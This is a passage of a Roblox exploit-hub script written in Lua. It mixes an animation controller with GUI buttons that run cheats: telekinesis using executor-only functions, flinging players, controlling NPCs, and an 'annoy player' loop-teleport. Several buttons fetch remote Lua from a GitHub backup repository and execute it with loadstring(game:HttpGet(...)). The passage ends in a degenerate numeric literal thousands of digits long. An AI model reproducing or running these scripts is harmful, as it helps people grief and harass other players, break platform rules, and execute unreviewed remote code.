config.ChildAdded:connect(function(child) configureAnimationSet(name, fileList) end)) table.insert(animTable[name].connections, config.ChildRemoved:connect(function(child) configureAnimationSet(name, fileList) end)) local idx = 0 for _, childPart in pairs(config:GetChildren()) do if (childPart:IsA("Animation")) then local newWeight = 1 local weightObject = childPart:FindFirstChild("Weight") if (weightObject ~= nil) then newWeight = weightObject.Value end animTable[name].count = animTable[name].count + 1 idx = animTable[name].count animTable[name][idx] = {} animTable[name][idx].anim = childPart animTable[name][idx].weight = newWeight animTable[name].totalWeight = animTable[name].totalWeight + animTable[name][idx].weight table.insert(animTable[name].connections, childPart.Changed:connect(function(property) configureAnimationSet(name, fileList) end)) table.insert(animTable[name].connections, childPart.ChildAdded:connect(function(property) configureAnimationSet(name, fileList) end)) table.insert(animTable[name].connections, childPart.ChildRemoved:connect(function(property) configureAnimationSet(name, fileList) end)) local lv = childPart:GetAttribute("LinearVelocity") if lv then strafingLocomotionMap[name] = {lv=lv, speed = lv.Magnitude} end if name == "run" or name == "walk" then if lv then fallbackLocomotionMap[name] = strafingLocomotionMap[name] else local speed = name == "run" and RUN_SPEED or WALK_SPEED fallbackLocomotionMap[name] = {lv=Vector2.new(0.0, speed), speed = speed} locomotionMap = fallbackLocomotionMap -- If you don't have a linear velocity with your run or walk, you can't blend/strafe --warn("Strafe blending disabled. No linear velocity information for "..'"'.."walk"..'"'.." and "..'"'.."run"..'"'..".") end end end end end ]] -- if you uncomment the above section, comment out this "if"-block if name == "run" or name == "walk" then local speed = name == "run" and RUN_SPEED or WALK_SPEED fallbackLocomotionMap[name] = {lv=Vector2.new(0.0, speed), speed = speed} locomotionMap = fallbackLocomotionMap -- If you don't have a linear velocity with your run or walk, you can't blend/strafe --warn("Strafe blending disabled. No linear velocity information for "..'"'.."walk"..'"'.." and "..'"'.."run"..'"'..".") end -- fallback to defaults if (animTable[name].count <= 0) then for idx, anim in pairs(fileList) do animTable[name][idx] = {} animTable[name][idx].anim = Instance.new("Animation") animTable[name][idx].anim.Name = name animTable[name][idx].anim.AnimationId = anim.id animTable[name][idx].weight = anim.weight animTable[name].count = animTable[name].count + 1 animTable[name].totalWeight = animTable[name].totalWeight + anim.weight end end -- preload anims for i, animType in pairs(animTable) do for idx = 1, animType.count, 1 do if PreloadedAnims[animType[idx].anim.AnimationId] == nil then Humanoid:LoadAnimation(animType[idx].anim) PreloadedAnims[animType[idx].anim.AnimationId] = true end end end end -- Setup animation objects function scriptChildModified(child) local fileList = animNames[child.Name] if (fileList ~= nil) then configureAnimationSet(child.Name, fileList) else if child:isA("StringValue") then animNames[child.Name] = {} configureAnimationSet(child.Name, animNames[child.Name]) end end end script.ChildAdded:connect(scriptChildModified) script.ChildRemoved:connect(scriptChildModified) -- Clear any existing animation tracks -- Fixes issue with characters that are moved in and out of the Workspace accumulating tracks local animator = if Humanoid then Humanoid:FindFirstChildOfClass("Animator") else nil if animator then local animTracks = animator:GetPlayingAnimationTracks() for i,track in ipairs(animTracks) do track:Stop(0) track:Destroy() end end for name, fileList in pairs(animNames) do configureAnimationSet(name, fileList) end for _,child in script:GetChildren() do if child:isA("StringValue") and not animNames[child.name] then animNames[child.Name] = {} configureAnimationSet(child.Name, animNames[child.Name]) end end -- ANIMATION -- declarations local toolAnim = "None" local toolAnimTime = 0 local jumpAnimTime = 0 local jumpAnimDuration = 0.31 local toolTransitionTime = 0.1 local fallTransitionTime = 0.2 local currentlyPlayingEmote = false -- functions function stopAllAnimations() local oldAnim = currentAnim -- return to idle if finishing an emote if (emoteNames[oldAnim] ~= nil and emoteNames[oldAnim] == false) then oldAnim = "idle" end if currentlyPlayingEmote then oldAnim = "idle" currentlyPlayingEmote = false end currentAnim = "" currentAnimInstance = nil if (currentAnimKeyframeHandler ~= nil) then currentAnimKeyframeHandler:disconnect() end if (currentAnimTrack ~= nil) then currentAnimTrack:Stop() currentAnimTrack:Destroy() currentAnimTrack = nil end for _,v in pairs(locomotionMap) do if v.track then v.track:Stop() v.track:Destroy() v.track = nil end end return oldAnim end function getHeightScale() if Humanoid then if not Humanoid.AutomaticScalingEnabled then return 1 end local scale = Humanoid.HipHeight / HumanoidHipHeight if AnimationSpeedDampeningObject == nil then AnimationSpeedDampeningObject = script:FindFirstChild("ScaleDampeningPercent") end if AnimationSpeedDampeningObject ~= nil then scale = 1 + (Humanoid.HipHeight - HumanoidHipHeight) * AnimationSpeedDampeningObject.Value / HumanoidHipHeight end return scale end return 1 end local function signedAngle(a, b) return -math.atan2(a.x * b.y - a.y * b.x, a.x * b.x + a.y * b.y) end local angleWeight = 2.0 local function get2DWeight(px, p1, p2, sx, s1, s2) local avgLength = 0.5 * (s1 + s2) local p_1 = {x = (sx - s1)/avgLength, y = (angleWeight * signedAngle(p1, px))} local p12 = {x = (s2 - s1)/avgLength, y = (angleWeight * signedAngle(p1, p2))} local denom = smallButNotZero + (p12.x*p12.x + p12.y*p12.y) local numer = p_1.x * p12.x + p_1.y * p12.y local r = math.clamp(1.0 - numer/denom, 0.0, 1.0) return r end local function blend2D(targetVelo, targetSpeed) local h = {} local sum = 0.0 for n,v1 in pairs(locomotionMap) do if targetVelo.x * v1.lv.x < 0.0 or targetVelo.y * v1.lv.y < 0 then -- Require same quadrant as target h[n] = 0.0 continue end h[n] = math.huge for j,v2 in pairs(locomotionMap) do if targetVelo.x * v2.lv.x < 0.0 or targetVelo.y * v2.lv.y < 0 then -- Require same quadrant as target continue end h[n] = math.min(h[n], get2DWeight(targetVelo, v1.lv, v2.lv, targetSpeed, v1.speed, v2.speed)) end sum += h[n] end --truncates below 10% contribution local sum2 = 0.0 local weightedVeloX = 0 local weightedVeloY = 0 for n,v in pairs(locomotionMap) do if (h[n] / sum > 0.1) then sum2 += h[n] weightedVeloX += h[n] * v.lv.x weightedVeloY += h[n] * v.lv.y else h[n] = 0.0 end end local animSpeed local weightedSpeedSquared = weightedVeloX * weightedVeloX + weightedVeloY * weightedVeloY if weightedSpeedSquared > smallButNotZero then animSpeed = math.sqrt(targetSpeed * targetSpeed / weightedSpeedSquared) else animSpeed = 0 end animSpeed = animSpeed / getHeightScale() local groupTimePosition = 0 for n,v in pairs(locomotionMap) do if v.track.IsPlaying then groupTimePosition = v.track.TimePosition break end end for n,v in pairs(locomotionMap) do -- if not loco if h[n] > 0.0 then if not v.track.IsPlaying then v.track:Play(runBlendtime) v.track.TimePosition = groupTimePosition end local weight = math.max(smallButNotZero, h[n] / sum2) v.track:AdjustWeight(weight, runBlendtime) v.track:AdjustSpeed(animSpeed) else v.track:Stop(runBlendtime) end end end local function getWalkDirection() local walkToPoint = Humanoid.WalkToPoint local walkToPart = Humanoid.WalkToPart if Humanoid.MoveDirection ~= Vector3.zero then return Humanoid.MoveDirection elseif walkToPart or walkToPoint ~= Vector3.zero then local destination if walkToPart then destination = walkToPart.CFrame:PointToWorldSpace(walkToPoint) else destination = walkToPoint end local moveVector = Vector3.zero if Humanoid.RootPart then moveVector = destination - Humanoid.RootPart.CFrame.Position moveVector = Vector3.new(moveVector.x, 0.0, moveVector.z) local mag = moveVector.Magnitude if mag > 0.01 then moveVector /= mag end end return moveVector else return Humanoid.MoveDirection end end local function updateVelocity(currentTime) local tempDir if locomotionMap == strafingLocomotionMap then local moveDirection = getWalkDirection() if not Humanoid.RootPart then return end local cframe = Humanoid.RootPart.CFrame if math.abs(cframe.UpVector.Y) < smallButNotZero or pose ~= "Running" or humanoidSpeed < 0.001 then -- We are horizontal! Do something (turn off locomotion) for n,v in pairs(locomotionMap) do if v.track then v.track:AdjustWeight(smallButNotZero, runBlendtime) end end return end local lookat = cframe.LookVector local direction = Vector3.new(lookat.X, 0.0, lookat.Z) direction = direction / direction.Magnitude --sensible upVector means this is non-zero. local ly = moveDirection:Dot(direction) if ly <= 0.0 and ly > -0.05 then ly = smallButNotZero -- break quadrant ties in favor of forward-friendly strafes end local lx = direction.X*moveDirection.Z - direction.Z*moveDirection.X local tempDir = Vector2.new(lx, ly) -- root space moveDirection local delta = Vector2.new(tempDir.x-cachedLocalDirection.x, tempDir.y-cachedLocalDirection.y) -- Time check serves the purpose of the old keyframeReached sync check, as it syncs anim timePosition if delta:Dot(delta) > 0.001 or math.abs(humanoidSpeed - cachedRunningSpeed) > 0.01 or currentTime - lastBlendTime > 1 then cachedLocalDirection = tempDir cachedRunningSpeed = humanoidSpeed lastBlendTime = currentTime blend2D(cachedLocalDirection, cachedRunningSpeed) end else if math.abs(humanoidSpeed - cachedRunningSpeed) > 0.01 or currentTime - lastBlendTime > 1 then cachedRunningSpeed = humanoidSpeed lastBlendTime = currentTime blend2D(Vector2.yAxis, cachedRunningSpeed) end end end function setAnimationSpeed(speed) if currentAnim ~= "walk" then if speed ~= currentAnimSpeed then currentAnimSpeed = speed currentAnimTrack:AdjustSpeed(currentAnimSpeed) end end end function keyFrameReachedFunc(frameName) if (frameName == "End") then local repeatAnim = currentAnim -- return to idle if finishing an emote if (emoteNames[repeatAnim] ~= nil and emoteNames[repeatAnim] == false) then repeatAnim = "idle" end if currentlyPlayingEmote then if currentAnimTrack.Looped then -- Allow the emote to loop return end repeatAnim = "idle" currentlyPlayingEmote = false end local animSpeed = currentAnimSpeed playAnimation(repeatAnim, 0.15, Humanoid) setAnimationSpeed(animSpeed) end end function rollAnimation(animName) local roll = math.random(1, animTable[animName].totalWeight) local origRoll = roll local idx = 1 while (roll > animTable[animName][idx].weight) do roll = roll - animTable[animName][idx].weight idx = idx + 1 end return idx end local maxVeloX, minVeloX, maxVeloY, minVeloY local function destroyRunAnimations() for _,v in pairs(strafingLocomotionMap) do if v.track then v.track:Stop() v.track:Destroy() v.track = nil end end for _,v in pairs(fallbackLocomotionMap) do if v.track then v.track:Stop() v.track:Destroy() v.track = nil end end cachedRunningSpeed = 0 end local function resetVelocityBounds(velo) minVeloX = 0 maxVeloX = 0 minVeloY = 0 maxVeloY = 0 end local function updateVelocityBounds(velo) if velo then if velo.x > maxVeloX then maxVeloX = velo.x end if velo.y > maxVeloY then maxVeloY = velo.y end if velo.x < minVeloX then minVeloX = velo.x end if velo.y < minVeloY then minVeloY = velo.y end end end local function checkVelocityBounds(velo) if maxVeloX == 0 or minVeloX == 0 or maxVeloY == 0 or minVeloY == 0 then if locomotionMap == strafingLocomotionMap then warn("Strafe blending disabled. Not all quadrants of motion represented.") end locomotionMap = fallbackLocomotionMap else locomotionMap = strafingLocomotionMap end end local function setupWalkAnimation(anim, animName, transitionTime, humanoid) resetVelocityBounds() -- check to see if we need to blend a walk/run animation for n,v in pairs(locomotionMap) do v.track = humanoid:LoadAnimation(animTable[n][1].anim) v.track.Priority = Enum.AnimationPriority.Core updateVelocityBounds(v.lv) end checkVelocityBounds() end local function switchToAnim(anim, animName, transitionTime, humanoid) -- switch animation if (anim ~= currentAnimInstance) then if (currentAnimTrack ~= nil) then currentAnimTrack:Stop(transitionTime) currentAnimTrack:Destroy() end if (currentAnimKeyframeHandler ~= nil) then currentAnimKeyframeHandler:disconnect() end currentAnimSpeed = 1.0 currentAnim = animName currentAnimInstance = anim -- nil in the case of locomotion if animName == "walk" then setupWalkAnimation(anim, animName, transitionTime, humanoid) else destroyRunAnimations() -- load it to the humanoid; get AnimationTrack currentAnimTrack = humanoid:LoadAnimation(anim) currentAnimTrack.Priority = Enum.AnimationPriority.Core currentAnimTrack:Play(transitionTime) -- set up keyframe name triggers currentAnimKeyframeHandler = currentAnimTrack.KeyframeReached:connect(keyFrameReachedFunc) end end end function playAnimation(animName, transitionTime, humanoid) local idx = rollAnimation(animName) local anim = animTable[animName][idx].anim switchToAnim(anim, animName, transitionTime, humanoid) currentlyPlayingEmote = false end function playEmote(emoteAnim, transitionTime, humanoid) switchToAnim(emoteAnim, emoteAnim.Name, transitionTime, humanoid) currentlyPlayingEmote = true end ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- local toolAnimName = "" local toolAnimTrack = nil local toolAnimInstance = nil local currentToolAnimKeyframeHandler = nil function toolKeyFrameReachedFunc(frameName) if (frameName == "End") then playToolAnimation(toolAnimName, 0.0, Humanoid) end end function playToolAnimation(animName, transitionTime, humanoid, priority) local idx = rollAnimation(animName) local anim = animTable[animName][idx].anim if (toolAnimInstance ~= anim) then if (toolAnimTrack ~= nil) then toolAnimTrack:Stop() toolAnimTrack:Destroy() transitionTime = 0 end -- load it to the humanoid; get AnimationTrack toolAnimTrack = humanoid:LoadAnimation(anim) if priority then toolAnimTrack.Priority = priority end -- play the animation toolAnimTrack:Play(transitionTime) toolAnimName = animName toolAnimInstance = anim currentToolAnimKeyframeHandler = toolAnimTrack.KeyframeReached:connect(toolKeyFrameReachedFunc) end end function stopToolAnimations() local oldAnim = toolAnimName if (currentToolAnimKeyframeHandler ~= nil) then currentToolAnimKeyframeHandler:disconnect() end toolAnimName = "" toolAnimInstance = nil if (toolAnimTrack ~= nil) then toolAnimTrack:Stop() toolAnimTrack:Destroy() toolAnimTrack = nil end return oldAnim end ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- -- STATE CHANGE HANDLERS function onRunning(speed) local movedDuringEmote = currentlyPlayingEmote and Humanoid.MoveDirection == Vector3.new(0, 0, 0) local speedThreshold = movedDuringEmote and Humanoid.WalkSpeed or 0.75 humanoidSpeed = speed if speed > speedThreshold then playAnimation("walk", 0.2, Humanoid) if pose ~= "Running" then pose = "Running" updateVelocity(0) -- Force velocity update in response to state change end else if emoteNames[currentAnim] == nil and not currentlyPlayingEmote then playAnimation("idle", 0.2, Humanoid) pose = "Standing" end end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing(speed) local scale = 5.0 playAnimation("climb", 0.1, Humanoid) setAnimationSpeed(speed / scale) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- function onSwimming(speed) if speed > 0 then pose = "Running" else pose = "Standing" end end function animateTool() if (toolAnim == "None") then playToolAnimation("toolnone", toolTransitionTime, Humanoid, Enum.AnimationPriority.Idle) return end if (toolAnim == "Slash") then playToolAnimation("toolslash", 0, Humanoid, Enum.AnimationPriority.Action) return end if (toolAnim == "Lunge") then playToolAnimation("toollunge", 0, Humanoid, Enum.AnimationPriority.Action) return end end function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end local lastTick = 0 function stepAnimate(currentTime) local amplitude = 1 local frequency = 1 local deltaTime = currentTime - lastTick lastTick = currentTime local climbFudge = 0 local setAngles = false if (jumpAnimTime > 0) then jumpAnimTime = jumpAnimTime - deltaTime end if (pose == "FreeFall" and jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) elseif (pose == "Seated") then playAnimation("sit", 0.5, Humanoid) return elseif (pose == "Running") then playAnimation("walk", 0.2, Humanoid) updateVelocity(currentTime) elseif (pose == "Dead" or pose == "GettingUp" or pose == "FallingDown" or pose == "Seated" or pose == "PlatformStanding") then stopAllAnimations() amplitude = 0.1 frequency = 1 setAngles = true end -- Tool Animation handling local tool = Character:FindFirstChildOfClass("Tool") if tool and tool:FindFirstChild("Handle") then local animStringValueObject = getToolAnim(tool) if animStringValueObject then toolAnim = animStringValueObject.Value -- message recieved, delete StringValue animStringValueObject.Parent = nil toolAnimTime = currentTime + .3 end if currentTime > toolAnimTime then toolAnimTime = 0 toolAnim = "None" end animateTool() else stopToolAnimations() toolAnim = "None" toolAnimInstance = nil toolAnimTime = 0 end end -- connect events Humanoid.Died:connect(onDied) Humanoid.Running:connect(onRunning) Humanoid.Jumping:connect(onJumping) Humanoid.Climbing:connect(onClimbing) Humanoid.GettingUp:connect(onGettingUp) Humanoid.FreeFalling:connect(onFreeFall) Humanoid.FallingDown:connect(onFallingDown) Humanoid.Seated:connect(onSeated) Humanoid.PlatformStanding:connect(onPlatformStanding) Humanoid.Swimming:connect(onSwimming) -- setup emote chat hook game:GetService("Players").LocalPlayer.Chatted:connect(function(msg) local emote = "" if (string.sub(msg, 1, 3) == "/e ") then emote = string.sub(msg, 4) elseif (string.sub(msg, 1, 7) == "/emote ") then emote = string.sub(msg, 8) end if (pose == "Standing" and emoteNames[emote] ~= nil) then playAnimation(emote, EMOTE_TRANSITION_TIME, Humanoid) end end) -- emote bindable hook script:WaitForChild("PlayEmote").OnInvoke = function(emote) -- Only play emotes when idling if pose ~= "Standing" then return end if emoteNames[emote] ~= nil then -- Default emotes playAnimation(emote, EMOTE_TRANSITION_TIME, Humanoid) return true, currentAnimTrack elseif typeof(emote) == "Instance" and emote:IsA("Animation") then -- Non-default emotes playEmote(emote, EMOTE_TRANSITION_TIME, Humanoid) return true, currentAnimTrack end -- Return false to indicate that the emote could not be played return false end if Character.Parent ~= nil then -- initialize to idle playAnimation("idle", 0.1, Humanoid) pose = "Standing" end -- loop to handle timed state transitions and tool animations task.spawn(function() while Character.Parent ~= nil do local _, currentGameTime = wait(0.1) stepAnimate(currentGameTime) end end) end RunCustomAnimation(plr.Character) plr.CharacterAdded:Connect(function(Char) RunCustomAnimation(Char) end) end }) Main:AddButton({ Title = "FE Teleknis script v2 only works on unachorned parts", Description = "use while moving Q E R T Y", Callback = function() -- Q & E - bring closer and further -- R - Roates Block -- T - Tilts Block -- Y - Throws Block local function a(b, c) local d = getfenv(c) local e = setmetatable( {}, { __index = function(self, f) if f == "script" then return b else return d[f] end end } ) setfenv(c, e) return c end local g = {} local h = Instance.new("Model", game:GetService("Lighting")) local i = Instance.new("Tool") local j = Instance.new("Part") local k = Instance.new("Script") local l = Instance.new("LocalScript") local m = sethiddenproperty or set_hidden_property i.Name = "Telekinesis" i.Parent = h i.Grip = CFrame.new(0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0) i.GripForward = Vector3.new(-0, -1, -0) i.GripRight = Vector3.new(0, 0, 1) i.GripUp = Vector3.new(1, 0, 0) j.Name = "Handle" j.Parent = i j.CFrame = CFrame.new(-17.2635937, 15.4915619, 46, 0, 1, 0, 1, 0, 0, 0, 0, -1) j.Orientation = Vector3.new(0, 180, 90) j.Position = Vector3.new(-17.2635937, 15.4915619, 46) j.Rotation = Vector3.new(-180, 0, -90) j.Color = Color3.new(0.0666667, 0.0666667, 0.0666667) j.Transparency = 1 j.Size = Vector3.new(1, 1.20000005, 1) j.BottomSurface = Enum.SurfaceType.Weld j.BrickColor = BrickColor.new("Really black") j.Material = Enum.Material.Metal j.TopSurface = Enum.SurfaceType.Smooth j.brickColor = BrickColor.new("Really black") k.Name = "LineConnect" k.Parent = i table.insert( g, a( k, function() wait() local n = script.Part2 local o = script.Part1.Value local p = script.Part2.Value local q = script.Par.Value local color = script.Color local r = Instance.new("Part") r.TopSurface = 0 r.BottomSurface = 0 r.Reflectance = .5 r.Name = "Laser" r.Locked = true r.CanCollide = false r.Anchored = true r.formFactor = 0 r.Size = Vector3.new(1, 1, 1) local s = Instance.new("BlockMesh") s.Parent = r while true do if n.Value == nil then break end if o == nil or p == nil or q == nil then break end if o.Parent == nil or p.Parent == nil then break end if q.Parent == nil then break end local t = CFrame.new(o.Position, p.Position) local dist = (o.Position - p.Position).magnitude r.Parent = q r.BrickColor = color.Value.BrickColor r.Reflectance = color.Value.Reflectance r.Transparency = color.Value.Transparency r.CFrame = CFrame.new(o.Position + t.lookVector * dist / 2) r.CFrame = CFrame.new(r.Position, p.Position) s.Scale = Vector3.new(.25, .25, dist) wait() end r:remove() script:remove() end ) ) k.Disabled = true l.Name = "MainScript" l.Parent = i table.insert( g, a( l, function() wait() tool = script.Parent lineconnect = tool.LineConnect object = nil mousedown = false found = false BP = Instance.new("BodyPosition") BP.maxForce = Vector3.new(math.huge * math.huge, math.huge * math.huge, math.huge * math.huge) BP.P = BP.P * 1.1 dist = nil point = Instance.new("Part") point.Locked = true point.Anchored = true point.formFactor = 0 point.Shape = 0 point.BrickColor = BrickColor.Black() point.Size = Vector3.new(1, 1, 1) point.CanCollide = false local s = Instance.new("SpecialMesh") s.MeshType = "Sphere" s.Scale = Vector3.new(.7, .7, .7) s.Parent = point handle = tool.Handle front = tool.Handle color = tool.Handle objval = nil local u = false local v = BP:clone() v.maxForce = Vector3.new(30000, 30000, 30000) function LineConnect(o, p, q) local w = Instance.new("ObjectValue") w.Value = o w.Name = "Part1" local x = Instance.new("ObjectValue") x.Value = p x.Name = "Part2" local y = Instance.new("ObjectValue") y.Value = q y.Name = "Par" local z = Instance.new("ObjectValue") z.Value = color z.Name = "Color" local A = lineconnect:clone() A.Disabled = false w.Parent = A x.Parent = A y.Parent = A z.Parent = A A.Parent = workspace if p == object then objval = x end end function onButton1Down(B) if mousedown == true then return end mousedown = true coroutine.resume( coroutine.create( function() local C = point:clone() C.Parent = tool LineConnect(front, C, workspace) while mousedown == true do C.Parent = tool if object == nil then if B.Target == nil then local t = CFrame.new(front.Position, B.Hit.p) C.CFrame = CFrame.new(front.Position + t.lookVector * 1000) else C.CFrame = CFrame.new(B.Hit.p) end else LineConnect(front, object, workspace) break end wait() end C:remove() end ) ) while mousedown == true do if B.Target ~= nil then local D = B.Target if D.Anchored == false then object = D dist = (object.Position - front.Position).magnitude break end end wait() end while mousedown == true do if object.Parent == nil then break end local t = CFrame.new(front.Position, B.Hit.p) BP.Parent = object BP.position = front.Position + t.lookVector * dist wait() end BP:remove() object = nil objval.Value = nil end function onKeyDown(E, B) local E = E:lower() local F = false if E == "q" then if dist >= 5 then dist = dist - 10 end end if E == "r" then if object == nil then return end for G, H in pairs(object:children()) do if H.className == "BodyGyro" then return nil end end BG = Instance.new("BodyGyro") BG.maxTorque = Vector3.new(math.huge, math.huge, math.huge) BG.cframe = CFrame.new(object.CFrame.p) BG.Parent = object repeat wait() until object.CFrame == CFrame.new(object.CFrame.p) BG.Parent = nil if object == nil then return end for G, H in pairs(object:children()) do if H.className == "BodyGyro" then H.Parent = nil end end object.Velocity = Vector3.new(0, 0, 0) object.RotVelocity = Vector3.new(0, 0, 0) object.Orientation = Vector3.new(0, 0, 0) end if E == "e" then dist = dist + 10 end if E == "t" then if dist ~= 10 then dist = 10 end end if E == "y" then if dist ~= 200 then dist = 200 end end if E == "=" then BP.P = BP.P * 1.5 end if E == "-" then BP.P = BP.P * 0.5 end end function onEquipped(B) keymouse = B local I = tool.Parent human = I.Humanoid human.Changed:connect( function() if human.Health == 0 then mousedown = false BP:remove() point:remove() tool:remove() end end ) B.Button1Down:connect( function() onButton1Down(B) end ) B.Button1Up:connect( function() mousedown = false end ) B.KeyDown:connect( function(E) onKeyDown(E, B) end ) B.Icon = "rbxasset://textures\\GunCursor.png" end tool.Equipped:connect(onEquipped) end ) ) for J, H in pairs(h:GetChildren()) do H.Parent = game:GetService("Players").LocalPlayer.Backpack pcall( function() H:MakeJoints() end ) end h:Destroy() for J, H in pairs(g) do spawn( function() pcall(H) end ) end end }) Main:AddButton({ Title = "FE Teleknis script v2 on mobile only works on unachorned parts", Description = "use while moving Q E R T Y", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/mobileteleknis.lua"))() end }) Main:AddButton({ Title = "FE drop tool", Description = "drops tool in front of you and if you go close to someone and if they walk over it or touch it they can pick it up sometimes", Callback = function() for i,v in pairs(game:GetService("Players").LocalPlayer:WaitForChild("Backpack"):GetChildren()) do if v:IsA("Tool") then v.Parent = game:GetService("Players").LocalPlayer.Character task.wait(0.3) v.Parent = game:GetService("Workspace") end end end }) Main:AddButton({ Title = "FE Zombie Animation/fling", Description = "FE zombie animation ur hella slow but it flings people when u walk into them and mouse button 1 down is like to rush/hit or sum", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/r6zombie.txt"))() end }) Main:AddButton({ Title = "FE r15 npc control", Description = "control npcs (that arent achored ofc) must be r15? i think idk", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/r15npccontrol.txt"))() end }) Main:AddButton({ Title = "FE stand on player head gui", Description = "FE stand on player head gui", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/fe%20standonplayerhead.txt"))() end }) Main:AddButton({ Title = "annoy player", Description = "loop tps to player", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/Annoy.txt"))() end }) Main:AddButton({ Title = "FE Emoji Chat", Description = "do :emojinamehere:", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/fe-emoji-chat.txt"))() end }) Main:AddButton({ Title = "FE Mouse Part", Description = "something with unachored parts um press q on them", Callback = function() -- ROBLOX FE PART + MOUSE FE SCRIPT -- Made by Rolevote. -- EXECUTE THIS SCRIPT ONCE PER SERVER local player = game:GetService("Players").LocalPlayer.Character local mouse = game:GetService("Players").LocalPlayer:GetMouse() local key = game:GetService("UserInputService") BodyAngularVelocity = true -- Want the Part/Handle to spin really fast Crazy! local keyyy = Enum.KeyCode.Q -- Key to run it on part local y = 5.7 local y2 = 7.2 local P = 1000000 local V = Vector3.new(100000,100000,100000) local SBT = Instance.new("SelectionBox") SBT.Name = "SB" SBT.Parent = player.HumanoidRootPart SBT.Adornee = player.HumanoidRootPart SBT.Color3 = Color3.new(0,0,0) while wait(.3) do key.InputBegan:Connect(function(k) if k.KeyCode == keyyy then local handle = mouse.Target if handle.Anchored == false then wait(.3) handle.Position = handle.Position + Vector3.new(0,1,0) local BP = Instance.new("BodyPosition") BP.Name = "BP" BP.Parent = handle BP.P = P BP.MaxForce = V local SB = Instance.new("SelectionBox") SB.Name = "SB" SB.Parent = handle SB.Adornee = handle local colour = math.random(1,7) if colour == 1 then SB.Color3 = Color3.new(255,0,0) end if colour == 2 then SB.Color3 = Color3.new(255,170,0) end if colour == 3 then SB.Color3 = Color3.new(255,255,0) end if colour == 4 then SB.Color3 = Color3.new(0,255,0) end if colour == 5 then SB.Color3 = Color3.new(0,170,255) end if colour == 6 then SB.Color3 = Color3.new(170,0,255) end if colour == 7 then SB.Color3 = Color3.new(0,0,0) end player.Torso.Anchored = true if BodyAngularVelocity == true then local BAV = Instance.new("BodyAngularVelocity") BAV.Name = "BAV" BAV.Parent = handle BAV.P = 99900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000